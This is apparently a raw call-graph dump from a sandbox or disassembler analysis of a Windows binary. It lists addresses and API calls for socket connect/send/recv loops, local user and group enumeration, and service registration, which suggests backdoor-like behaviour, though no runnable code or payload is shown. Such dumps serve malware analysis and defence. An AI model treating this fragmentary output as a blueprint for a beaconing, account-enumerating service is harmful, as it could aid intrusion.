61418->61416 61420 7ffe0eb44f01 WSAGetLastError 61419->61420 61421 7ffe0eb44ef7 61419->61421 61422 7ffe0eb41292 6 API calls 61420->61422 61421->61362 61422->61421 61423->61371 61425 7ffe0eb47cd6 GetSystemTimeAsFileTime 61424->61425 61426 7ffe0eb47ccb EnterCriticalSection 61424->61426 61425->61426 61426->61402 61428 7ffe0eb500da 61427->61428 61443 7ffe0eb50102 61427->61443 61429 7ffe0eb500e4 61428->61429 61430 7ffe0eb5014a 61428->61430 61431 7ffe0eb50120 61429->61431 61432 7ffe0eb500e6 61429->61432 61458 7ffe0eb4f8ba 91 API calls 61430->61458 61436 7ffe0eb50151 61431->61436 61437 7ffe0eb50127 61431->61437 61434 7ffe0eb500ed 61432->61434 61435 7ffe0eb50158 61432->61435 61438 7ffe0eb500ef 61434->61438 61447 7ffe0eb5010b 61434->61447 61460 7ffe0eb4fa61 24 API calls 61435->61460 61459 7ffe0eb4f92f 47 API calls 61436->61459 61441 7ffe0eb50143 61437->61441 61442 7ffe0eb5012e 61437->61442 61444 7ffe0eb5015f 61438->61444 61445 7ffe0eb500f6 61438->61445 61452 7ffe0eb4f7c8 61441->61452 61442->61443 61457 7ffe0eb4f7d6 184 API calls 61442->61457 61443->61402 61461 7ffe0eb4fb0a 18 API calls 61444->61461 61445->61443 61455 7ffe0eb4fc03 34 API calls 61445->61455 61447->61443 61456 7ffe0eb4fb83 15 API calls 61447->61456 61462 7ffe0eb4f780 61452->61462 61455->61443 61456->61443 61457->61443 61458->61443 61459->61443 61460->61443 61461->61443 61469 7ffe0eb4e2fb 61462->61469 61465 7ffe0eb4f7a1 61465->61443 61468 7ffe0eb4e2fb 2 API calls 61468->61465 61470 7ffe0eb4e311 QueryPerformanceFrequency QueryPerformanceCounter 61469->61470 61471 7ffe0eb4e306 61469->61471 61470->61471 61471->61465 61472 7ffe0eb46c3d 61471->61472 61509 7ffe0eb46bff 61472->61509 61475 7ffe0eb46c53 61475->61468 61476 7ffe0eb41770 8 API calls 61477 7ffe0eb46c73 61476->61477 61478 7ffe0eb4e0f1 8 API calls 61477->61478 61479 7ffe0eb46c88 61478->61479 61480 7ffe0eb46c92 strlen 61479->61480 61481 7ffe0eb46d39 61479->61481 61483 7ffe0eb46caf 61480->61483 61484 7ffe0eb46cc8 strlen 61480->61484 61481->61475 61482 7ffe0eb46d41 strlen 61481->61482 61485 7ffe0eb46d6e strlen 61482->61485 61486 7ffe0eb46d58 61482->61486 61483->61484 61487 7ffe0eb46cb4 strlen 61483->61487 61514 7ffe0eb4d196 10 API calls 61484->61514 61516 7ffe0eb4d196 10 API calls 61485->61516 61486->61485 61489 7ffe0eb46d5d strlen 61486->61489 61487->61484 61489->61485 61491 7ffe0eb46d0e 61491->61475 61515 7ffe0eb4dcc8 8 API calls 61491->61515 61492 7ffe0eb46db1 61495 7ffe0eb46dc7 CompareFileTime 61492->61495 61500 7ffe0eb46dbe 61492->61500 61494 7ffe0eb46d37 61494->61481 61496 7ffe0eb46df7 61495->61496 61498 7ffe0eb46ddb 61495->61498 61519 7ffe0eb4c6f1 8 API calls 61496->61519 61498->61500 61517 7ffe0eb44988 22 API calls 61498->61517 61500->61475 61501 7ffe0eb46de4 61502 7ffe0eb46de8 61501->61502 61520 7ffe0eb44013 7 API calls 61501->61520 61518 7ffe0eb449a3 GetProcessHeap HeapFree GetProcessHeap HeapFree LeaveCriticalSection 61502->61518 61505 7ffe0eb46e2c 61505->61502 61521 7ffe0eb44097 42 API calls 61505->61521 61507 7ffe0eb46e41 61507->61502 61522 7ffe0eb43c9c 19 API calls 61507->61522 61523 7ffe0eb45ac0 61509->61523 61513 7ffe0eb46c0c 61513->61475 61513->61476 61514->61491 61515->61494 61516->61492 61517->61501 61518->61500 61519->61498 61520->61505 61521->61507 61522->61502 61524 7ffe0eb42472 9 API calls 61523->61524 61525 7ffe0eb45b03 61524->61525 61526 7ffe0eb45b07 strlen 61525->61526 61530 7ffe0eb45b73 61525->61530 61528 7ffe0eb45b40 strcmp 61526->61528 61529 7ffe0eb45b81 61528->61529 61528->61530 61537 7ffe0eb4dcc8 8 API calls 61529->61537 61530->61513 61536 7ffe0eb4533e 27 API calls 61530->61536 61532 7ffe0eb45ba7 61532->61530 61533 7ffe0eb45bb9 61532->61533 61538 7ffe0eb4d9e9 8 API calls 61533->61538 61535 7ffe0eb45bc3 61535->61530 61536->61513 61537->61532 61538->61535 61539 7ffe0e16184a 61547 7ffe0e161855 61539->61547 61540 7ffe0e16195e 61541 7ffe0e16196b 61540->61541 61606 7ffe0e1622d5 10 API calls 61540->61606 61543 7ffe0e16187d Sleep 61543->61547 61545 7ffe0e1622d5 10 API calls 61545->61547 61547->61540 61547->61543 61547->61545 61548 7ffe0e161932 Sleep 61547->61548 61550 7ffe0e16191e memcpy 61547->61550 61551 7ffe0e16256c socket 61547->61551 61586 7ffe0e162a1a 61547->61586 61597 7ffe0e161780 61547->61597 61548->61547 61550->61547 61552 7ffe0e1625a3 61551->61552 61553 7ffe0e16276b WSAGetLastError 61551->61553 61554 7ffe0e1625c5 61552->61554 61555 7ffe0e1625a7 61552->61555 61556 7ffe0e161292 6 API calls 61553->61556 61559 7ffe0e162209 8 API calls 61554->61559 61607 7ffe0e162209 61555->61607 61558 7ffe0e16278f 61556->61558 61561 7ffe0e1625df 61558->61561 61562 7ffe0e162799 61558->61562 61563 7ffe0e1625c3 61559->61563 61566 7ffe0e161292 6 API calls 61561->61566 61565 7ffe0e161292 6 API calls 61562->61565 61580 7ffe0e1625d7 61563->61580 61620 7ffe0e16233a setsockopt 61563->61620 61564 7ffe0e16261e 61568 7ffe0e162623 htonl htons connect 61564->61568 61564->61580 61570 7ffe0e162600 61565->61570 61566->61570 61572 7ffe0e162661 61568->61572 61573 7ffe0e16267c WSAGetLastError 61568->61573 61570->61547 61574 7ffe0e162209 8 API calls 61572->61574 61575 7ffe0e16273e WSAGetLastError 61573->61575 61576 7ffe0e16268d 61573->61576 61578 7ffe0e16266e 61574->61578 61577 7ffe0e161292 6 API calls 61575->61577 61579 7ffe0e162695 select 61576->61579 61576->61580 61577->61580 61578->61558 61578->61580 61581 7ffe0e162720 61579->61581 61582 7ffe0e1626f6 61579->61582 61624 7ffe0e1622d5 10 API calls 61580->61624 61583 7ffe0e161292 6 API calls 61581->61583 61582->61572 61584 7ffe0e1626fc WSAGetLastError 61582->61584 61583->61580 61585 7ffe0e161292 6 API calls 61584->61585 61585->61580 61587 7ffe0e162a34 61586->61587 61588 7ffe0e162aa8 61586->61588 61587->61588 61590 7ffe0e162a39 recv 61587->61590 61589 7ffe0e161292 6 API calls 61588->61589 61596 7ffe0e162a53 61589->61596 61591 7ffe0e162a4f 61590->61591 61592 7ffe0e162a5c WSAGetLastError 61590->61592 61594 7ffe0e161292 6 API calls 61591->61594 61591->61596 61593 7ffe0e162a70 61592->61593 61592->61596 61595 7ffe0e161292 6 API calls 61593->61595 61594->61596 61595->61596 61596->61547 61598 7ffe0e161842 61597->61598 61599 7ffe0e161798 61597->61599 61598->61547 61599->61598 61625 7ffe0e16a000 61599->61625 61602 7ffe0e161834 LeaveCriticalSection 61602->61598 61603 7ffe0e1617c8 61603->61602 61604 7ffe0e161292 6 API calls 61603->61604 61628 7ffe0e16e342 61603->61628 61604->61603 61606->61541 61608 7ffe0e162219 ioctlsocket 61607->61608 61610 7ffe0e16224d WSAGetLastError 61608->61610 61611 7ffe0e16223c 61608->61611 61612 7ffe0e161292 6 API calls 61610->61612 61611->61564 61613 7ffe0e162154 setsockopt 61611->61613 61612->61611 61614 7ffe0e1621e4 WSAGetLastError 61613->61614 61615 7ffe0e162189 setsockopt 61613->61615 61617 7ffe0e161292 6 API calls 61614->61617 61616 7ffe0e1621bf WSAGetLastError 61615->61616 61619 7ffe0e1621b5 61615->61619 61618 7ffe0e161292 6 API calls 61616->61618 61617->61619 61618->61619 61619->61563 61621 7ffe0e162381 WSAGetLastError 61620->61621 61622 7ffe0e162377 61620->61622 61623 7ffe0e161292 6 API calls 61621->61623 61622->61564 61623->61622 61624->61561 61626 7ffe0e1617ab EnterCriticalSection 61625->61626 61627 7ffe0e16a016 GetSystemTimeAsFileTime 61625->61627 61626->61603 61627->61626 61629 7ffe0e16e372 61628->61629 61650 7ffe0e16e3bc 61628->61650 61630 7ffe0e16e380 61629->61630 61631 7ffe0e16e4c7 61629->61631 61632 7ffe0e16e434 61630->61632 61633 7ffe0e16e386 61630->61633 61680 7ffe0e16dc30 70 API calls 61631->61680 61635 7ffe0e16e47c 61632->61635 61641 7ffe0e16e43b 61632->61641 61636 7ffe0e16e4d5 61633->61636 61637 7ffe0e16e391 61633->61637 61638 7ffe0e16e483 61635->61638 61639 7ffe0e16e4c0 61635->61639 61682 7ffe0e16e09c 56 API calls 61636->61682 61642 7ffe0e16e393 61637->61642 61643 7ffe0e16e3e6 61637->61643 61638->61650 61670 7ffe0e16d2bb 61638->61670 61679 7ffe0e16d95d 52 API calls 61639->61679 61641->61650 61677 7ffe0e16d86e 57 API calls 61641->61677 61647 7ffe0e16e39a 61642->61647 61648 7ffe0e16e3cb 61642->61648 61645 7ffe0e16e3f1 61643->61645 61646 7ffe0e16e4ce 61643->61646 61651 7ffe0e16e3f3 61645->61651 61652 7ffe0e16e419 61645->61652 61681 7ffe0e16de68 53 API calls 61646->61681 61654 7ffe0e16e3a5 61647->61654 61655 7ffe0e16e4e3 61647->61655 61648->61650 61674 7ffe0e16e22c 16 API calls 61648->61674 61650->61603 61659 7ffe0e16e3fe 61651->61659 61660 7ffe0e16e4dc 61651->61660 61652->61650 61676 7ffe0e16df82 53 API calls 61652->61676 61661 7ffe0e16e3b0 61654->61661 61662 7ffe0e16e491 61654->61662 61684 7ffe0e16e2bc 16 API calls 61655->61684 61659->61650 61666 7ffe0e16e405 61659->61666 61683 7ffe0e16e143 49 API calls 61660->61683 61661->61650 61673 7ffe0e16d342 14 API calls 61661->61673 61678 7ffe0e16d2c9 18 API calls 61662->61678 61675 7ffe0e16da46 57 API calls 61666->61675 61669 7ffe0e16e40a 61669->61650 61685 7ffe0e16d110 61670->61685 61673->61650 61674->61650 61675->61669 61676->61650 61677->61650 61678->61650 61679->61650 61680->61669 61681->61650 61682->61650 61683->61650 61684->61650 61712 7ffe0e1691fb 61685->61712 61690 7ffe0e16d160 61718 7ffe0e165a68 17 API calls 61690->61718 61691 7ffe0e16d167 61693 7ffe0e16a000 GetSystemTimeAsFileTime 61691->61693 61696 7ffe0e16d17a 61693->61696 61694 7ffe0e16d298 61720 7ffe0e165a68 17 API calls 61694->61720 61696->61694 61698 7ffe0e16d1a6 strlen 61696->61698 61697 7ffe0e16d29d 61700 7ffe0e1691fb 2 API calls 61697->61700 61702 7ffe0e16d13a 61697->61702 61699 7ffe0e161292 6 API calls 61698->61699 61701 7ffe0e16d1de GetProcessHeap HeapAlloc 61699->61701 61700->61702 61703 7ffe0e16d200 61701->61703 61704 7ffe0e16d27d 61701->61704 61702->61650 61706 7ffe0e16a000 GetSystemTimeAsFileTime 61703->61706 61705 7ffe0e161292 6 API calls 61704->61705 61708 7ffe0e16d293 61705->61708 61707 7ffe0e16d22f strcpy 61706->61707 61719 7ffe0e161992 13 API calls 61707->61719 61708->61694 61710 7ffe0e16d258 61710->61696 61711 7ffe0e16d261 GetProcessHeap HeapFree 61710->61711 61711->61696 61713 7ffe0e169211 QueryPerformanceFrequency QueryPerformanceCounter 61712->61713 61714 7ffe0e169206 61712->61714 61713->61714 61714->61702 61715 7ffe0e165a47 EnterCriticalSection 61714->61715 61721 7ffe0e164049 61715->61721 61718->61702 61719->61710 61720->61697 61722 7ffe0e164065 61721->61722 61725 7ffe0e164055 61721->61725 61727 7ffe0e162fbf 61722->61727 61724 7ffe0e16405f 61724->61690 61724->61691 61725->61724 61749 7ffe0e16387f 61725->61749 61770 7ffe0e162edf 8 API calls 61727->61770 61729 7ffe0e162fd4 61730 7ffe0e1635d6 61729->61730 61731 7ffe0e1634d0 NetLocalGroupEnum 61729->61731 61736 7ffe0e163546 GetProcessHeap HeapAlloc 61729->61736 61739 7ffe0e1634ad NetApiBufferFree 61729->61739 61732 7ffe0e1635df 61730->61732 61733 7ffe0e16361c 61730->61733 61731->61729 61734 7ffe0e163729 61732->61734 61740 7ffe0e1635e7 61732->61740 61735 7ffe0e161292 6 API calls 61733->61735 61738 7ffe0e161292 6 API calls 61734->61738 61735->61740 61741 7ffe0e162fe3 61736->61741 61742 7ffe0e163579 61736->61742 61744 7ffe0e163609 61738->61744 61739->61729 61771 7ffe0e162edf 8 API calls 61740->61771 61741->61729 61747 7ffe0e161292 6 API calls 61741->61747 61745 7ffe0e163585 memcpy GetProcessHeap HeapFree 61742->61745 61746 7ffe0e1635b4 61742->61746 61743 7ffe0e1635ec 61748 7ffe0e161292 6 API calls 61743->61748 61744->61725 61745->61746 61746->61725 61747->61741 61748->61744 61772 7ffe0e16379f 61749->61772 61751 7ffe0e163ed7 61753 7ffe0e163ee0 61751->61753 61755 7ffe0e161292 6 API calls 61751->61755 61752 7ffe0e163dba NetUserEnum 61754 7ffe0e163894 61752->61754 61768 7ffe0e163ee8 61753->61768 61769 7ffe0e164014 61753->61769 61754->61751 61754->61752 61757 7ffe0e163d97 NetApiBufferFree 61754->61757 61759 7ffe0e163e36 GetProcessHeap HeapAlloc 61754->61759 61755->61753 61756 7ffe0e161292 6 API calls 61760 7ffe0e163f0a 61756->61760 61757->61754 61758 7ffe0e16379f 8 API calls 61761 7ffe0e163eed 61758->61761 61762 7ffe0e1638a3 61759->61762 61763 7ffe0e163e70 61759->61763 61760->61724 61765 7ffe0e161292 6 API calls 61761->61765 61762->61754 61764 7ffe0e161292 6 API calls 61762->61764 61766 7ffe0e163eb5 61763->61766 61767 7ffe0e163e7c memcpy GetProcessHeap HeapFree 61763->61767 61764->61762 61765->61760 61766->61724 61767->61766 61768->61758 61769->61756 61770->61729 61771->61743 61773 7ffe0e163864 61772->61773 61775 7ffe0e1637b2 61772->61775 61773->61754 61774 7ffe0e163841 61774->61773 61776 7ffe0e16384d GetProcessHeap HeapFree 61774->61776 61775->61774 61777 7ffe0e1637e7 GetProcessHeap HeapFree 61775->61777 61778 7ffe0e16380c GetProcessHeap HeapFree 61775->61778 61779 7ffe0e163831 LocalFree 61775->61779 61780 7ffe0e163839 LocalFree 61775->61780 61776->61773 61777->61775 61778->61775 61779->61775 61780->61775 61781 7ff6bfd68a03 61782 7ff6bfd6849a 116 API calls 61781->61782 61783 7ff6bfd68a0d 61782->61783 61784 7ff6bfd68a72 RegisterServiceCtrlHandlerA 61783->61784 61792 7ff6bfd68a13 61783->61792 61785 7ff6bfd68a92 61784->61785 61786 7ff6bfd68ab3 GetLastError 61784->61786 61811 7ff6bfd681e0 SetServiceStatus 61785->61811 61787 7ff6bfd699e2 6 API calls 61786->61787 61787->61792 61790 7ff6bfd68a3a 61814 7ff6bfd688ee 10 API calls 61790->61814 61797 7ff6bfd68a1b 61792->61797 61801 7ff6bfd68bff 61792->61801 61812 7ff6bfd681e0 SetServiceStatus 61792->61812 61793 7ff6bfd68ba6 61798 7ff6bfd699e2 6 API calls 61793->61798 61794 7ff6bfd68aa7 61799 7ff6bfd68563 376 API calls 61794->61799 61796 7ff6bfd68a3f 61815 7ff6bfd689aa 13 API calls 61796->61815 61797->61790 61813 7ff6bfd681e0 SetServiceStatus 61797->61813 61802 7ff6bfd68bc0 61798->61802 61799->61792 61805 7ff6bfd68c3b ExitProcess 61801->61805 61804 7ff6bfd68bd6 61802->61804 61810 7ff6bfd6886d 25 API calls 61802->61810 61803 7ff6bfd68a44 61803->61805 61808 7ff6bfd68a4c 61803->61808 61806 7ff6bfd699e2 6 API calls 61804->61806 61806->61797 61807 7ff6bfd68a6b 61808->61807 61816 7ff6bfd681e0 SetServiceStatus 61808->61816 61810->61802 61811->61794 61812->61793 61813->61790 61814->61796 61815->61803 61816->61807 61817 7ffe11509b0a 61821 7ffe11509b15 61817->61821 61818 7ffe11509c1e 61819 7ffe11509c2b 61818->61819 61884 7ffe115019a5 61818->61884 61821->61818 61822 7ffe11509b3d Sleep 61821->61822 61824 7ffe115019a5 10 API calls 61821->61824 61826 7ffe11509bf2 Sleep 61821->61826 61828 7ffe11509bde memcpy 61821->61828 61829 7ffe11501c3c socket 61821->61829 61864 7ffe115020ea 61821->61864 61875 7ffe11509a40 61821->61875 61822->61821 61824->61821 61826->61821 61828->61821 61830 7ffe11501e3b WSAGetLastError 61829->61830 61831 7ffe11501c73 61829->61831 61834 7ffe11501292 6 API calls 61830->61834 61832 7ffe11501c77 61831->61832 61833 7ffe11501c95 61831->61833 61893 7ffe115018d9 61832->61893 61837 7ffe115018d9 8 API calls 61833->61837 61836 7ffe11501e5f 61834->61836 61839 7ffe11501e69 61836->61839 61840 7ffe11501caf 61836->61840 61851 7ffe11501c93 61837->61851 61843 7ffe11501292 6 API calls 61839->61843 61841 7ffe11501292 6 API calls 61840->61841 61844 7ffe11501cd0 61841->61844 61842 7ffe11501cee 61847 7ffe11501cf3 htonl htons connect 61842->61847 61860 7ffe11501ca7 61842->61860 61843->61844 61844->61821 61845 7ffe115019a5 10 API calls 61845->61840 61849 7ffe11501d4c WSAGetLastError 61847->61849 61850 7ffe11501d31 61847->61850 61853 7ffe11501d5d 61849->61853 61854 7ffe11501e0e WSAGetLastError 61849->61854 61852 7ffe115018d9 8 API calls 61850->61852 61851->61860 61906 7ffe11501a0a setsockopt 61851->61906 61857 7ffe11501d3e 61852->61857 61855 7ffe11501d65 select 61853->61855 61853->61860 61856 7ffe11501292 6 API calls 61854->61856 61858 7ffe11501dc6 61855->61858 61859 7ffe11501df0 61855->61859 61856->61860 61857->61836 61857->61860 61858->61850 61861 7ffe11501dcc WSAGetLastError 61858->61861 61862 7ffe11501292 6 API calls 61859->61862 61860->61845 61863 7ffe11501292 6 API calls 61861->61863 61862->61860 61863->61860 61865 7ffe11502178 61864->61865 61866 7ffe11502104 61864->61866 61867 7ffe11501292 6 API calls 61865->61867 61866->61865 61868 7ffe11502109 recv 61866->61868 61871 7ffe11502123 61867->61871 61869 7ffe1150212c WSAGetLastError 61868->61869 61870 7ffe1150211f 61868->61870 61869->61871 61872 7ffe11502140 61869->61872 61870->61871 61874 7ffe11501292 6 API calls 61870->61874 61871->61821 61873 7ffe11501292 6 API calls 61872->61873 61873->61871 61874->61871 61876 7ffe11509b02 61875->61876 61877 7ffe11509a58 61875->61877 61876->61821 61877->61876 61910 7ffe11502800 61877->61910 61880 7ffe11509af4 LeaveCriticalSection 61880->61876 61881 7ffe11509a88 61881->61880 61882 7ffe11501292 6 API calls 61881->61882 61913 7ffe1150330e 61881->61913 61882->61881 61885 7ffe115019b9 61884->61885 61892 7ffe115019b3 61884->61892 62172 7ffe11501942 shutdown 61885->62172 61888 7ffe115019e9 WSAGetLastError 61891 7ffe11501292 6 API calls 61888->61891 61889 7ffe115019d1 61890 7ffe11501292 6 API calls 61889->61890 61890->61892 61891->61892 61892->61819 61894 7ffe115018e9 ioctlsocket 61893->61894 61896 7ffe1150191d WSAGetLastError 61894->61896 61897 7ffe1150190c 61894->61897 61898 7ffe11501292 6 API calls 61896->61898 61897->61842 61899 7ffe11501824 setsockopt 61897->61899 61898->61897 61900 7ffe11501859 setsockopt 61899->61900 61901 7ffe115018b4 WSAGetLastError 61899->61901 61903 7ffe11501885 61900->61903 61904 7ffe1150188f WSAGetLastError 61900->61904 61902 7ffe11501292 6 API calls 61901->61902 61902->61903 61903->61851 61905 7ffe11501292 6 API calls 61904->61905 61905->61903 61907 7ffe11501a47 61906->61907 61908 7ffe11501a51 WSAGetLastError 61906->61908 61907->61842 61909 7ffe11501292 6 API calls 61908->61909 61909->61907 61911 7ffe1150280b EnterCriticalSection 61910->61911 61912 7ffe11502816 GetSystemTimeAsFileTime 61910->61912 61911->61881 61912->61911 61914 7ffe1150339c 61913->61914 61915 7ffe11503330 61913->61915 61916 7ffe115033b7 61914->61916 61917 7ffe115033a6 61914->61917 61925 7ffe11503347 61915->61925 61982 7ffe1150464b 61915->61982 61919 7ffe1150464b 2 API calls 61916->61919 61918 7ffe11503392 61917->61918 61922 7ffe11502800 GetSystemTimeAsFileTime 61917->61922 61918->61881 61919->61918 61924 7ffe1150348a 61922->61924 61923 7ffe115037bb 61926 7ffe1150384f 61923->61926 61934 7ffe11503800 61923->61934 61927 7ffe11504170 8 API calls 61924->61927 61925->61918 61928 7ffe1150394a 61925->61928 61929 7ffe11503957 GetProcessHeap HeapAlloc 61925->61929 61931 7ffe1150464b 2 API calls 61926->61931 61930 7ffe11503570 61927->61930 61928->61929 61932 7ffe115039f1 61929->61932 61933 7ffe1150397f memcpy 61929->61933 62014 7ffe11508684 12 API calls 61930->62014 61936 7ffe11503859 61931->61936 61939 7ffe11501292 6 API calls 61932->61939 61961 7ffe115039bf 61933->61961 61942 7ffe1150382a 61934->61942 61943 7ffe1150386f 61934->61943 61985 7ffe11502f80 61936->61985 61938 7ffe1150358c 61940 7ffe11503594 61938->61940 61941 7ffe11503701 61938->61941 61944 7ffe115036f7 61939->61944 61947 7ffe11504170 8 API calls 61940->61947 62021 7ffe11505fd5 30 API calls 61941->62021 61948 7ffe11503834 61942->61948 61949 7ffe1150387e 61942->61949 61991 7ffe1150305e 61943->61991 61944->61918 61952 7ffe115035a2 61947->61952 61953 7ffe1150464b 2 API calls 61948->61953 61951 7ffe1150464b 2 API calls 61949->61951 61950 7ffe1150372e 61950->61940 61954 7ffe11503888 61951->61954 62015 7ffe11508684 12 API calls 61952->62015 61953->61918 61954->61918 61958 7ffe11502800 GetSystemTimeAsFileTime 61954->61958 61955 7ffe115039d5 GetProcessHeap HeapFree 61955->61918 61957 7ffe115035be 61959 7ffe115035c6 61957->61959 61960 7ffe1150374e 61957->61960 61963 7ffe115038e5 61958->61963 62016 7ffe11504692 8 API calls 61959->62016 62022 7ffe11505fd5 30 API calls 61960->62022 61969 7ffe115039c7 61961->61969 62024 7ffe115032a5 8 API calls 61961->62024 61967 7ffe1150464b 2 API calls 61963->61967 61966 7ffe1150377b 61966->61959 61970 7ffe115038f7 61967->61970 61968 7ffe115035d0 62017 7ffe11504818 10 API calls 61968->62017 61969->61918 61969->61955 62023 7ffe11509c52 13 API calls 61970->62023 61973 7ffe11503605 62018 7ffe1150ac80 58 API calls 61973->62018 61976 7ffe11503671 61977 7ffe11503698 61976->61977 62019 7ffe11501770 7 API calls 61976->62019 61978 7ffe115036c8 61977->61978 61979 7ffe115036b1 GetProcessHeap HeapFree 61977->61979 62020 7ffe11509c52 13 API calls 61978->62020 61979->61978 61983 7ffe11504661 QueryPerformanceFrequency QueryPerformanceCounter 61982->61983 61984 7ffe115037a5 61982->61984 61983->61984 61984->61923 61984->61925 61986 7ffe11502fad 61985->61986 61988 7ffe11502f90 61985->61988 61987 7ffe11502fbe 61986->61987 61989 7ffe115019a5 10 API calls 61986->61989 61987->61918 61988->61986 62025 7ffe1150959c 61988->62025 61989->61987 61992 7ffe11503072 61991->61992 61996 7ffe115031f6 61991->61996 61995 7ffe11503097 61992->61995 61992->61996 61993 7ffe115030d0 61993->61918 61994 7ffe1150321e 61997 7ffe1150322b 61994->61997 62001 7ffe11501c3c 27 API calls 61994->62001 61998 7ffe115030f3 61995->61998 61999 7ffe115030a1 61995->61999 61996->61993 61996->61994 62000 7ffe11501c3c 27 API calls 61996->62000 61997->61993 62004 7ffe1150464b 2 API calls 61997->62004 62070 7ffe1150961b 61998->62070 62002 7ffe1150317a 61999->62002 62003 7ffe115030ae 61999->62003 62000->61994 62001->61997 62109 7ffe11509428 47 API calls 62002->62109 62003->61993 62108 7ffe1150991a 67 API calls 62003->62108 62004->61993 62008 7ffe11503186 62008->61993 62012 7ffe1150464b 2 API calls 62008->62012 62010 7ffe115030c8 62010->61993 62013 7ffe1150464b 2 API calls 62010->62013 62011 7ffe1150464b 2 API calls 62011->61993 62012->61993 62013->61993 62014->61938 62015->61957 62016->61968 62017->61973 62018->61976 62019->61977 62020->61944 62021->61950 62022->61966 62023->61918 62024->61969 62026 7ffe115095aa 62025->62026 62029 7ffe115095b8 62025->62029 62033 7ffe11509570 62026->62033 62029->61986 62032 7ffe115019a5 10 API calls 62032->62029 62034 7ffe11509587 62033->62034 62035 7ffe1150957d 62033->62035 62034->62029 62037 7ffe115090ca 62034->62037 62035->62034 62036 7ffe115019a5 10 API calls 62035->62036 62036->62034 62039 7ffe115090f9 62037->62039 62038 7ffe1150ed60 fputc 62038->62039 62039->62038 62040 7ffe1150915e 62039->62040 62041 7ffe115091bb GetProcessHeap HeapAlloc 62039->62041 62042 7ffe1150910d GetProcessHeap HeapReAlloc 62039->62042 62043 7ffe11501292 6 API calls 62040->62043 62041->62039 62044 7ffe115091df 62041->62044 62042->62039 62045 7ffe115091f7 62042->62045 62046 7ffe11509174 strlen 62043->62046 62047 7ffe11501292 6 API calls 62044->62047 62048 7ffe11501292 6 API calls 62045->62048 62056 7ffe115090b2 62046->62056 62051 7ffe115091f5 62047->62051 62052 7ffe1150920d 62048->62052 62053 7ffe11509229 62051->62053 62052->62053 62055 7ffe11509212 GetProcessHeap HeapFree 62052->62055 62053->62032 62054 7ffe1150919a GetProcessHeap HeapFree 62054->62053 62055->62053 62059 7ffe1150219d 62056->62059 62060 7ffe1150224c 62059->62060 62061 7ffe115021c8 62059->62061 62062 7ffe11501292 6 API calls 62060->62062 62061->62060 62063 7ffe115021cd 62061->62063 62069 7ffe11502220 62062->62069 62064 7ffe115021d6 send 62063->62064 62066 7ffe11502219 62063->62066 62064->62063 62065 7ffe115021fa WSAGetLastError 62064->62065 62067 7ffe11501292 6 API calls 62065->62067 62068 7ffe11501292 6 API calls 62066->62068 62066->62069 62067->62066 62068->62069 62069->62053 62069->62054 62071 7ffe11509650 62070->62071 62080 7ffe1150312f 62070->62080 62072 7ffe115096bf 62071->62072 62073 7ffe115096ab strlen 62071->62073 62110 7ffe11502cb2 62072->62110 62073->62072 62075 7ffe1150978d 62073->62075 62078 7ffe1150959c 21 API calls 62075->62078 62075->62080 62078->62080 62080->61993 62080->62011 62081 7ffe115090ca 17 API calls 62082 7ffe1150972e 62081->62082 62082->62075 62119 7ffe11509331 62082->62119 62086 7ffe11509773 62087 7ffe11509777 62086->62087 62127 7ffe11508c26 strcmp 62086->62127 62087->62075 62126 7ffe11508c8d 6 API calls 62087->62126 62089 7ffe115097c5 62089->62075 62091 7ffe115097d1 strlen 62089->62091 62091->62075 62092 7ffe115097e5 62091->62092 62092->62087 62093 7ffe115097f4 strcpy 62092->62093 62128 7ffe11508c8d 6 API calls 62093->62128 62095 7ffe11509808 62096 7ffe115090ca 17 API calls 62095->62096 62097 7ffe11509817 62096->62097 62097->62075 62098 7ffe11509331 28 API calls 62097->62098 62099 7ffe11509827 62098->62099 62099->62075 62129 7ffe11508b20 strcmp strcmp strcmp strcmp 62099->62129 62101 7ffe11509855 62101->62087 62102 7ffe11509863 62101->62102 62108->62010 62109->62008 62111 7ffe11502d0a 62110->62111 62112 7ffe11502cce 62110->62112 62114 7ffe115093f4 62111->62114 62112->62111 62132 7ffe11502c92 rand_s 62112->62132 62133 7ffe11509084 62114->62133 62117 7ffe11509419 62117->62075 62117->62081 62159 7ffe1150924c 62119->62159 62122 7ffe11509356 62122->62075 62125 7ffe11508b20 strcmp strcmp strcmp strcmp 62122->62125 62123 7ffe1150934c 62168 7ffe11508e50 24 API calls 62123->62168 62125->62086 62126->62075 62127->62089 62128->62095 62129->62101 62132->62112 62134 7ffe11501c3c 27 API calls 62133->62134 62135 7ffe11509091 62134->62135 62136 7ffe1150909a 62135->62136 62152 7ffe11501a76 setsockopt 62135->62152 62136->62117 62138 7ffe11509365 62136->62138 62139 7ffe115090ca 17 API calls 62138->62139 62140 7ffe1150937a 62139->62140 62141 7ffe115093c3 62140->62141 62142 7ffe11509331 28 API calls 62140->62142 62143 7ffe115019a5 10 API calls 62141->62143 62144 7ffe11509386 62142->62144 62145 7ffe115093d0 62143->62145 62156 7ffe11508b20 strcmp strcmp strcmp strcmp 62144->62156 62150 7ffe115093be 62145->62150 62158 7ffe11508c8d 6 API calls 62145->62158 62147 7ffe115093b2 62147->62141 62148 7ffe115093b6 62147->62148 62157 7ffe11508c8d 6 API calls 62148->62157 62150->62117 62153 7ffe11501aab 62152->62153 62154 7ffe11501ab5 WSAGetLastError 62152->62154 62153->62136 62155 7ffe11501292 6 API calls 62154->62155 62155->62153 62156->62147 62157->62150 62158->62150 62160 7ffe11509274 62159->62160 62161 7ffe1150928c 62159->62161 62160->62161 62162 7ffe1150927d memset 62160->62162 62161->62122 62161->62123 62163 7ffe11509296 62162->62163 62163->62161 62165 7ffe115092c4 strchr 62163->62165 62169 7ffe1150923e 62163->62169 62165->62163 62166 7ffe115092db 62165->62166 62167 7ffe11501292 6 API calls 62166->62167 62167->62161 62168->62122 62170 7ffe115020ea 8 API calls 62169->62170 62171 7ffe11509247 62170->62171 62171->62163 62173 7ffe1150195b 62172->62173 62174 7ffe11501979 WSAGetLastError 62172->62174 62175 7ffe11501292 6 API calls 62173->62175 62176 7ffe11501986 62174->62176 62177 7ffe11501971 closesocket 62174->62177 62175->62177 62178 7ffe11501292 6 API calls 62176->62178 62177->61888 62177->61889 62178->62177 62179 7ffe13306230 62180 7ffe1330625b LeaveCriticalSection 62179->62180 62181 7ffe13306238 62179->62181 62188 7ffe133061e8 62180->62188 62181->62179 62198 7ffe13301cbd 62181->62198 62182 7ffe1330626d GetProcessHeap HeapFree 62182->62188 62184 7ffe1330634c Sleep SleepEx 62185 7ffe1330635c EnterCriticalSection 62184->62185 62187 7ffe13306380 62185->62187 62186 7ffe1330629b EnterCriticalSection 62186->62188 62189 7ffe133062be 